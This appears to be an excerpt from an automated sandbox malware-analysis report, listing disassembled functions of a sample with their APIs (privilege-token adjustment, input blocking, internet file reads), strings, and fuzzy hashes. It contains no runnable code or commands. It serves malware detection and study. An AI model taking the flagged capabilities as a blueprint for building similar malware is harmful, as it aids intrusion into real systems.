                                                                          • Instruction ID: fee55283ff15e8bce1d5b4aed22908f2308eca2ec0818a3e6aced2005a7b5851
                                                                          • Opcode Fuzzy Hash: c2212e710faa0aa25c6585764cd3283daba03b8e8a3efd7139333ad593dfd05c
                                                                          • Instruction Fuzzy Hash: B6F01D36A1AB5286D715DB56B04401AB7A0FB88B90B958534DF8943B28EF3CE9958B80
                                                                          Function 00007FF7ADC42F50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .
                                                                          • API String ID: 0-248832578
                                                                          • Opcode ID: 704ebd355b677e1258a9e20fb2f824619711b00144154a2c45bc08c04a856543
                                                                          • Instruction ID: 0713c297cff2bb825fddc4c79148e2668aedc05c8f78c03f53fc71128f7b7dec
                                                                          • Opcode Fuzzy Hash: 704ebd355b677e1258a9e20fb2f824619711b00144154a2c45bc08c04a856543
                                                                          • Instruction Fuzzy Hash: AA313A95B2D69148E720AF62980C676EA52FB90BE4FC58631EE6D07BE5FE3CD4024210
                                                                          Function 00007FF7ADC467F0 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionRaise_clrfp
                                                                          • String ID:
                                                                          • API String ID: 15204871-0
                                                                          • Opcode ID: 2c887139cc1f69395780bda7c312862f1bbc48349006177215bd8e385e5acab5
                                                                          • Instruction ID: e487f1665d113ba3cba29da3605f90e4042ae566b561b9c4c6c381a26f164fbf
                                                                          • Opcode Fuzzy Hash: 2c887139cc1f69395780bda7c312862f1bbc48349006177215bd8e385e5acab5
                                                                          • Instruction Fuzzy Hash: 75B18EB3606B848FEB15CF29C4493ACBBA1F744B48F958921DA6D837B8DB39D452C710
                                                                          Function 00007FF7ADC8E968 Relevance: 3.1, APIs: 2, Instructions: 97networkfileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                                          • String ID:
                                                                          • API String ID: 599397726-0
                                                                          • Opcode ID: a54c6d4a74e6411871131af3bdbcf589181ad988d0891215d2ce77e29c03cb3f
                                                                          • Instruction ID: a2719d98dd3b7affc00f24714cf82f9278996f7d8d20061804b252010a8be3b3
                                                                          • Opcode Fuzzy Hash: a54c6d4a74e6411871131af3bdbcf589181ad988d0891215d2ce77e29c03cb3f
                                                                          • Instruction Fuzzy Hash: 9031C436B0DA018AFB58EF26C450BFCA795FB84B89FA14435DE0D47BA4EE39D4428310
                                                                          Function 00007FF7ADC6CCE0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                          • String ID:
                                                                          • API String ID: 81990902-0
                                                                          • Opcode ID: 2696843c0c1c48d019296e0beaf727179f08331fefa667d0a626b5bdda81ebd6
                                                                          • Instruction ID: d4c17d54322fff90dcf83657781000f9bf8ee1ded332abfa5acb44d32ba51456
                                                                          • Opcode Fuzzy Hash: 2696843c0c1c48d019296e0beaf727179f08331fefa667d0a626b5bdda81ebd6
                                                                          • Instruction Fuzzy Hash: 09F0E566A2CA4182EB50EB61E4113B8A360FBD8F88FA00531CE0D07768DF3CC0878220
                                                                          Function 00007FF7ADC395B0 Relevance: 2.9, Strings: 2, Instructions: 378COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: a/p$am/pm
                                                                          • API String ID: 0-3206640213
                                                                          • Opcode ID: b6ff340540ec1a6ec0d6140cfc1c8523425437697bcd52408c2e8c1b88fcdfce
                                                                          • Instruction ID: 90a0a37d764b0132c38c7e58b2224f0a26444c92995bff570b1b3a9816e609f6
                                                                          • Opcode Fuzzy Hash: b6ff340540ec1a6ec0d6140cfc1c8523425437697bcd52408c2e8c1b88fcdfce
                                                                          • Instruction Fuzzy Hash: 5EE1C822A0E6528AE76CAF1481445BDE3B1FF41780FD64231EA1E466E4FF7DE952C720
                                                                          Function 00007FF7ADC2C3FC Relevance: 2.7, Strings: 2, Instructions: 219COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: 0$0x%p
                                                                          • API String ID: 3215553584-2479247192
                                                                          • Opcode ID: 2cf1ea9a671600e4e0a2c177b28b5012e25eeeeabff85c4abdd8ee56160d1f52
                                                                          • Instruction ID: a4d9bc8129d43a03af41e9f384beefc0fa11e9dbc967d9efb944c67b011ed954
                                                                          • Opcode Fuzzy Hash: 2cf1ea9a671600e4e0a2c177b28b5012e25eeeeabff85c4abdd8ee56160d1f52
                                                                          • Instruction Fuzzy Hash: 3A812822A1E6424EEA64BB25824067EA3D0EF40B44FD61531DD0D876B5FF3DE847E721
                                                                          Function 00007FF7ADC10E70 Relevance: 1.9, Strings: 1, Instructions: 680COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Variable is not of type 'Object'.
                                                                          • API String ID: 0-1840281001
                                                                          • Opcode ID: 0846f4224996d3c000beb684e8f92ad8a272e358ff67d15cb6cee7ad666ce03d
                                                                          • Instruction ID: 38fb10e5294b7bf9f9950e9ede7b88915fc05396a5987a892fe5fa7a8bb1b49d
                                                                          • Opcode Fuzzy Hash: 0846f4224996d3c000beb684e8f92ad8a272e358ff67d15cb6cee7ad666ce03d
                                                                          • Instruction Fuzzy Hash: 26524E32A0E6529EEB10EF60C0442FCA7A1EB45788FD24135EA0D576A6EF3DE547C760
                                                                          Function 00007FF7ADC1FA4F Relevance: 1.7, Strings: 1, Instructions: 447COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: no error
                                                                          • API String ID: 0-1106124726
                                                                          • Opcode ID: daf22cd7e491b1831c7a4d7ece73bd53412841c2595e7b00d29937dbea50e64a
                                                                          • Instruction ID: e5ff707ccf1567e9a51a02a95ddafadd20616c065ec4eeb3d18e39016c3bbb9f
                                                                          • Opcode Fuzzy Hash: daf22cd7e491b1831c7a4d7ece73bd53412841c2595e7b00d29937dbea50e64a
                                                                          • Instruction Fuzzy Hash: 9212BD72A097918EE724EF65D4402ADB3B0FB44748F915135EA4E47BA4EF38E942C750
                                                                          Function 00007FF7ADC90A00 Relevance: 1.5, APIs: 1, Instructions: 23keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: BlockInput
                                                                          • String ID:
                                                                          • API String ID: 3456056419-0
                                                                          • Opcode ID: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
                                                                          • Instruction ID: e835d4ba2db22034fb115a757417044551f65e672d5c447f3a993b19396c957e
                                                                          • Opcode Fuzzy Hash: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
                                                                          • Instruction Fuzzy Hash: 6FE0653271D6428AEB44AB65E040279E290EB98B84FD55034EA0D833A5FE7CD4918750
                                                                          Function 00007FF7ADC62BCF Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: NameUser
                                                                          • String ID:
                                                                          • API String ID: 2645101109-0
                                                                          • Opcode ID: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
                                                                          • Instruction ID: ea03224027cbb9e3a7ac157b8b43399d96a8d1154b7d9ab6cfe8f8d4bbcf61dc
                                                                          • Opcode Fuzzy Hash: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
                                                                          • Instruction Fuzzy Hash: 78C01272619662DDE760DF20D8841DC3330F71031CFC01021E60A0E478EF78C249C350
                                                                          Function 00007FF7ADC2C130 Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: 0
                                                                          • API String ID: 3215553584-4108050209
                                                                          • Opcode ID: e36cd3313365073150127e4babc7a8598c5f16c08797db25288978382bee99ce
                                                                          • Instruction ID: 524d0eb6bb41df0ccb601f53cd84fdc02ee60dec30de9d1412e0e64e8c48e4e6
                                                                          • Opcode Fuzzy Hash: e36cd3313365073150127e4babc7a8598c5f16c08797db25288978382bee99ce
                                                                          • Instruction Fuzzy Hash: 2C816A21A1E2034EEA69BB55824067EA3A0EF41B44FDA1931DD0D876B5FF2DE907C360
                                                                          Function 00007FF7ADC2BEB4 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: 0
                                                                          • API String ID: 3215553584-4108050209
                                                                          • Opcode ID: 1b448239c859d57582f3fa817e0dbfe1db0dd889c5120d72b994c6c156eeceba
                                                                          • Instruction ID: 3803436760e3572426d1198c1245c254c7ebbb093c7d62b9f82acb0607b9d4ef
                                                                          • Opcode Fuzzy Hash: 1b448239c859d57582f3fa817e0dbfe1db0dd889c5120d72b994c6c156eeceba
                                                                          • Instruction Fuzzy Hash: 3771E715A0E2824EEB68BB19418427DE7A1DF41B44FD60535ED08876FBFE2DF8478B21
                                                                          Function 00007FF7ADC3A8A0 Relevance: 1.4, Strings: 1, Instructions: 139COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @
                                                                          • API String ID: 0-2766056989
                                                                          • Opcode ID: 16c5ff97d355010ed637a1ec5e52f006fc41d4859a4220ae5f264295bc75ec93
                                                                          • Instruction ID: 2b0af7e9536181a40517cd61e10f19215cd822cee0ed5ad928cacd4d4f68b506
                                                                          • Opcode Fuzzy Hash: 16c5ff97d355010ed637a1ec5e52f006fc41d4859a4220ae5f264295bc75ec93
                                                                          • Instruction Fuzzy Hash: 5441B572719B448AEA48EF2AD4142A9F3A1F74CFD0B8A9036DE0D87765EE7CD546C300
                                                                          Function 00007FF7ADC0B9F0 Relevance: .6, Instructions: 577COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a2428b1a41b9dab0837923aee02f6dd20d06634fc1108aa9b555873352bd9b52
                                                                          • Instruction ID: dcbe81b9501a02b3db5b6b2748008bfdb3d74fe49204cb5831002be2baa459d6
                                                                          • Opcode Fuzzy Hash: a2428b1a41b9dab0837923aee02f6dd20d06634fc1108aa9b555873352bd9b52
                                                                          • Instruction Fuzzy Hash: 0942A332B0D7428AEB10EB25D4842ADB7A1FB84798FD24135DE5D47BA9EF38E442C750
                                                                          Function 00007FF7ADC330DC Relevance: .5, Instructions: 535COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 44e0bcb64cdb213a1ae13f0197e832722533c3c8cf9ea28823a7f9588fce5fb2
                                                                          • Instruction ID: 69617391b2dd25e9ace019d084e911dddb66976945158bd514021f80ace9aa17
                                                                          • Opcode Fuzzy Hash: 44e0bcb64cdb213a1ae13f0197e832722533c3c8cf9ea28823a7f9588fce5fb2
                                                                          • Instruction Fuzzy Hash: 88423D2192EE4A8CE357AB75A815525E725FF61380FC29332E80E76671FF6CE4478620
                                                                          Function 00007FF7ADC46DE4 Relevance: .2, Instructions: 194COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID:
                                                                          • API String ID: 3215553584-0
                                                                          • Opcode ID: 8d8f3e37eadd19746a70c291c5831625e20ba123285d38ae931568fef80f1606
                                                                          • Instruction ID: 58bf9f644e27c2b40363cbc384e09dd8187f5e483ba43542da97920cf95bcb45
                                                                          • Opcode Fuzzy Hash: 8d8f3e37eadd19746a70c291c5831625e20ba123285d38ae931568fef80f1606
                                                                          • Instruction Fuzzy Hash: C871FBA1B0E2524EF734A925944C7B9D2C3EF40360FD60634E66D476E5FE7DE8438620
                                                                          Function 00007FF7ADC81A18 Relevance: .1, Instructions: 66COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c2308bd2b59363eb380d9f2aadf6ae7fcc9e74111fd97fe2ff68e231cb56cb52
                                                                          • Instruction ID: be3d90e1d27846a0cd27c1186c624af131a989a970dad2a4b32b90c6aa5c0345
                                                                          • Opcode Fuzzy Hash: c2308bd2b59363eb380d9f2aadf6ae7fcc9e74111fd97fe2ff68e231cb56cb52
                                                                          • Instruction Fuzzy Hash: 7721D433A291418AE70CCF75D462AE973D5E354708F89C13AD51B83294EE3CE906C790
                                                                          Function 00007FF7ADC3FD20 Relevance: .0, Instructions: 32COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
